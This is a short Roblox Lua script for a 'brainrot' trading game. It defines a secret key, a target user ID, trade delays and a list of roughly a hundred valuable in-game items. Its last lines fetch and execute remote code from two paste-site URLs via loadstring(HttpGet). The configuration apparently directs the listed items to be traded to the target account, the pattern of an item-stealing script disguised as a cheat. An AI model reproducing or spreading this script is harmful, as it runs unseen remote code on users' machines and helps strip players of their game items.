getgenv().SECRET_KEY = "mrr_00b7903ac7154a21bc5a1118b1a7a717"
getgenv().TARGET_ID = 10691213885
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["Los Sekolahs"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Cloverat Clapat"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Rosetti Tualetti"] = true,
    ["Duggy Bros"] = true,
    ["Globa Steppa"] = true,
    ["Gold Gold Gold"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Orcaledon"] = true,
    ["Tictac Sahur"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Dug dug dug"] = true,
    ["Rico Dinero"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tuff Toucan"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Money Money Reindeer"] = true,
    ["La Spooky Grande"] = true,
    ["Los Bros"] = true,
    ["La Extinct Grande"] = true,
    ["Celularcini Viciosini"] = true,
    ["Money Money Puggy"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Las Sis"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Fragola La La La"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["Digi Narwhal"] = true,
    ["Bunny and Eggy"] = true,
    ["Kalika Bros"] = true,
    ["Cash or Card"] = true,
    ["Los Chillis"] = true,
    ["Hydra Bunny"] = true,
    ["Gym Bros"] = true,
    ["Quackini Snackini"] = true,
    ["La Easter Grande"] = true,
    ["Los Mariachis"] = true,
    ["La Lucky Grande"] = true,
    ["Guest 666"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Boppin Bunny"] = true,
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Love Love Bear"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["La Secret Combinasion"] = true,
    ["La Casa Boo"] = true,
    ["Spooky and Pumpky"] = true,
    ["Garama and Madundung"] = true,
    ["Festive 67"] = true,
    ["Ginger Gerat"] = true,
    ["Nacho Spyder"] = true,
    ["Antonio"] = true,
    ["La Food Combinasion"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Signore Carapace"] = true,
    ["Elefanto Frigo"] = true,
    ["Fishino Clownino"] = true,
    ["Donkeyturbo Express"] = true,
    ["Hopilikalika Hopilikalako"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://luapot.com/api/loadstring/26c4a4331358247078ffc36b7a17d913"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://pastefy.app/nfCFsita/raw"))()
end)
